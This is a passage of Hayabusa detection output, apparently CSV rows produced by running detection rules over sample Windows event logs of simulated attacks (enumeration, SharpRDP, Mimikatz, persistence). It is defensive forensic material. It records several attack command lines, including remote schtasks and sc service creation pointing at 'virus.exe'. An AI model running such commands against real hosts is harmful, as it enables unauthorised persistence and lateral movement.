+09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: FS03VULN$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx 2020-07-10 05:41:04.887 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: krbtgt | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx 2020-07-10 05:41:04.912 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: ROOTDC2$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx 2020-07-10 05:41:04.939 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: krbtgt | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx 2020-07-10 05:41:04.949 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: krbtgt | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx 2020-07-10 05:41:04.950 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: krbtgt | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx 2020-07-10 05:41:04.951 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: krbtgt | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx 2020-07-10 05:41:05.016 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: ROOTDC2$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx 2020-07-10 05:41:58.983 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx 2020-07-10 05:41:59.810 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx 2020-07-10 05:57:38.917 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x64f5bad,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx 2020-07-10 05:57:40.334 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: lambda-user | Computer: - | IP Addr: 10.23.23.9 | LID: 0x64f5bf1,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx 2020-07-10 05:57:40.365 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: lambda-user | Computer: - | IP Addr: 10.23.23.9 | LID: 0x64f5c04,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx 2020-07-10 05:57:40.430 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,../hayabusa-rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx 2020-07-10 05:57:40.430 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,../hayabusa-rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx 2020-07-10 05:57:40.714 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: lambda-user | Computer: - | IP Addr: 10.23.23.9 | LID: 0x64f5c7f,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx 2020-07-10 05:57:40.723 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: lambda-user | Computer: - | IP Addr: 10.23.23.9 | LID: 0x64f5cb1,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx 2020-07-10 05:57:40.725 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: lambda-user | Computer: - | IP Addr: 10.23.23.9 | LID: 0x64f5cc8,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx 2020-07-10 05:57:40.728 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: lambda-user | Computer: - | IP Addr: 10.23.23.9 | LID: 0x64f5cf4,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx 2020-07-10 05:57:40.825 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,../hayabusa-rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx 2020-07-10 05:57:52.909 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: ATACORE01$ | Computer: - | IP Addr: 10.23.42.30 | LID: 0x64f5ef5,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx 2020-07-10 05:58:11.977 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x64f6471,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx 2020-07-10 05:58:11.981 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: ROOTDC1$ | Computer: - | IP Addr: fe80::1cae:5aa4:9d8d:106a | LID: 0x64f64a3,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx 2020-07-10 05:58:12.004 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x64f64ca,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx 2020-07-10 05:58:12.005 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x64f64e1,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx 2020-07-10 05:58:12.005 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x64f64f3,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx 2020-07-10 06:22:31.163 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,../hayabusa-rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738,5136-SPN set on user account.evtx" 2020-07-10 06:25:41.773 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,../hayabusa-rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738,5136-SPN set on user account.evtx" 2020-07-10 07:00:11.181 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 192.168.56.1:52543 (LAPTOP-JU4M3I0E) | Dst: 192.168.56.101:3389 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 428 | PGUID: 747F3D96-85F1-5F07-0000-001074CB0000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx 2020-07-10 07:00:17.584 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\windows\system32\notepad.exe"" | Process: C:\Windows\System32\notepad.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x68b4a | PID: 2568 | PGUID: 747F3D96-9371-5F07-0000-00102D024400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx 2020-07-10 07:00:27.033 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 192.168.56.1:52545 (LAPTOP-JU4M3I0E) | Dst: 192.168.56.101:3389 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 428 | PGUID: 747F3D96-85F1-5F07-0000-001074CB0000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx 2020-07-10 07:00:31.217 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\windows\system32\notepad.exe"" | Process: C:\Windows\System32\notepad.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x68b4a | PID: 7356 | PGUID: 747F3D96-937F-5F07-0000-0010EBDD4400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx 2020-07-10 07:00:40.413 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 192.168.56.1:52546 (LAPTOP-JU4M3I0E) | Dst: 192.168.56.101:3389 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 428 | PGUID: 747F3D96-85F1-5F07-0000-001074CB0000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx 2020-07-10 07:00:45.589 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x68b4a | PID: 7976 | PGUID: 747F3D96-938D-5F07-0000-001043A84500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx 2020-07-10 07:00:48.105 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: c:\windows\system32\notepad.exe | Process: C:\Windows\System32\notepad.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x68b4a | PID: 8032 | PGUID: 747F3D96-9390-5F07-0000-00105CBC4500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx 2020-07-10 07:00:58.550 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 192.168.56.1:52547 (LAPTOP-JU4M3I0E) | Dst: 192.168.56.101:3389 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 428 | PGUID: 747F3D96-85F1-5F07-0000-001074CB0000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx 2020-07-10 07:01:03.898 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe"" | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x68b4a | PID: 7456 | PGUID: 747F3D96-939F-5F07-0000-0010888E4600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx 2020-07-10 07:01:06.427 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\windows\system32\notepad.exe"" | Process: C:\Windows\System32\notepad.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe"" | LID: 0x68b4a | PID: 7200 | PGUID: 747F3D96-93A2-5F07-0000-00108EC54600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx 2020-07-10 07:05:58.373 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ? | LID: 0x3e7 | PID: 3096 | PGUID: 747F3D96-94C3-5F07-0000-001080B40100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx 2020-07-10 07:06:07.487 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\Explorer.EXE | Process: C:\Windows\explorer.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\userinit.exe | LID: 0x3bfab | PID: 3248 | PGUID: 747F3D96-94CF-5F07-0000-0010BD590400,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx 2020-07-10 19:20:34.910 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: rdpclip | Process: C:\Windows\System32\rdpclip.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\System32\svchost.exe -k NetworkService -s TermService | LID: 0x3bfab | PID: 3304 | PGUID: 747F3D96-40F2-5F08-0000-0010D8A92C00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx 2020-07-10 19:20:35.589 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 192.168.56.1:53627 (LAPTOP-JU4M3I0E) | Dst: 192.168.56.101:3389 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 824 | PGUID: 747F3D96-1350-5F08-0000-001014C50000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx 2020-07-10 19:20:37.637 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""\\tsclient\c\temp\stack\a.exe"" | Process: \\tsclient\c\temp\stack\a.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x3bfab | PID: 4236 | PGUID: 747F3D96-40F5-5F08-0000-001095812D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx 2020-07-10 19:20:37.637 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx 2020-07-11 22:21:11.693 +09:00,wec02,70,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1552.004-Unsecured Credentials-Private Keys/ID70-CAPI-Private key accessed Mimikatz.evtx 2020-07-11 22:21:17.514 +09:00,wec02,70,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1552.004-Unsecured Credentials-Private Keys/ID70-CAPI-Private key accessed Mimikatz.evtx 2020-07-11 22:21:18.640 +09:00,wec02,70,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1552.004-Unsecured Credentials-Private Keys/ID70-CAPI-Private key accessed Mimikatz.evtx 2020-07-12 02:16:42.576 +09:00,fs02.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x3023704,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5142- New file share created.evtx 2020-07-12 02:16:42.592 +09:00,fs02.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x3023704,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5142- New file share created.evtx 2020-07-12 02:16:50.984 +09:00,fs02.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x3023704,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5142- New file share created.evtx 2020-07-12 02:17:49.788 +09:00,fs02.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x3023704,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5143-File share permissions changed.evtx 2020-07-12 02:17:49.788 +09:00,fs02.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x3023704,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5143-File share permissions changed.evtx 2020-07-12 02:18:01.228 +09:00,fs02.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x3023704,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5143-File share permissions changed.evtx 2020-07-12 06:09:03.249 +09:00,jump01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: schtasks /create /s fs02 /tn tasks_test_hacker2 /tr myapp.exe /sc daily /mo 10 | Path: C:\Windows\System32\schtasks.exe | PID: 0x1e18 | User: lambda-user | LID: 0x1d41a5fa,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4688-Scheduled task creation.evtx 2020-07-12 06:38:17.351 +09:00,fs02.offsec.lan,4698,info,,Task Created,"Name: \smbservice | Content: 2020-07-11T21:38:17 OFFSEC\lambda-user 2020-07-11T15:20:00 true IgnoreNew true true true false false PT10M PT1H true false true true false false false PT72H 7 C:\WINDOWS\Temp\MpCmdRun.bat S-1-5-18 LeastPrivilege | User: admmig | LID: 0x3246775",../hayabusa-rules/hayabusa/non-default/events/Security/ScheduledTasks/4698_ScheduledTaskCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4698-4699-Fast created & deleted task by SMBexec (sups. arg.).evtx 2020-07-12 06:38:17.445 +09:00,fs02.offsec.lan,4699,info,,Task Deleted,Name: \smbservice | User: admmig | LID: 0x3246ace,../hayabusa-rules/hayabusa/non-default/events/Security/ScheduledTasks/4699_ScheduledTaskDeleted.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4698-4699-Fast created & deleted task by SMBexec (sups. arg.).evtx 2020-07-12 06:38:17.445 +09:00,fs02.offsec.lan,4699,medium,Exec | PrivEsc,Scheduled Task Deletion,,../hayabusa-rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4698-4699-Fast created & deleted task by SMBexec (sups. arg.).evtx 2020-07-12 06:46:39.786 +09:00,jump01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: sc \\fs02\ create hacker-testl binPath=""virus.exe"" | Path: C:\Windows\System32\sc.exe | PID: 0x53c | User: admmig | LID: 0x58dbaa",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-Command SC to create service on remote host.evtx 2020-07-12 06:49:56.318 +09:00,fs02.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-Random service installation.evtx 2020-07-12 06:50:07.213 +09:00,fs02.offsec.lan,7045,info,Persis,Service Installed,Name: bad-task | Path: virusé.exe | Account: LocalSystem | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-Random service installation.evtx 2020-07-12 14:10:08.442 +09:00,rootdc1.offsec.lan,4720,low,Persis,Local User Account Created,User: admin-kriss | SID: S-1-5-21-4230534742-2542757381-3142984815-1166,../hayabusa-rules/hayabusa/default/alerts/Security/4720_AccountCreated_UserAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4720-4726 Fast created-deleted user.evtx 2020-07-12 14:10:08.442 +09:00,rootdc1.offsec.lan,4720,low,Persis,Local User Account Created,User: admin-kriss | SID: S-1-5-21-4230534742-2542757381-3142984815-1166,../hayabusa-rules/hayabusa/default/alerts/Security/4720_AccountCreated_UserAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4720-Admin like user created.evtx 2020-07-12 14:12:58.295 +09:00,jump01.offsec.lan,4720,low,Persis,Local User Account Created,User: hacking-local-acct | SID: S-1-5-21-1470532092-3758209836-3742276719-1001,../hayabusa-rules/hayabusa/default/alerts/Security/4720_AccountCreated_UserAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4720-Local user created.evtx 2020-07-12 14:14:30.976 +09:00,jump01.offsec.lan,4732,high,Persis,User Added To Local Administrators Group,SID: S-1-5-21-1470532092-3758209836-3742276719-1001 | Group: Administrators | LID: 0x58d874,../hayabusa-rules/hayabusa/default/alerts/Security/4732-MemberAddedToLocalGroup_Administrators.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4732-User added to local admin groups.evtx 2020-07-12 14:14:30.976 +09:00,jump01.offsec.lan,4732,high,Persis,User Added To Local Administrators Group,SID: S-1-5-21-1470532092-3758209836-3742276719-1001 | Group: Administrators | LID: 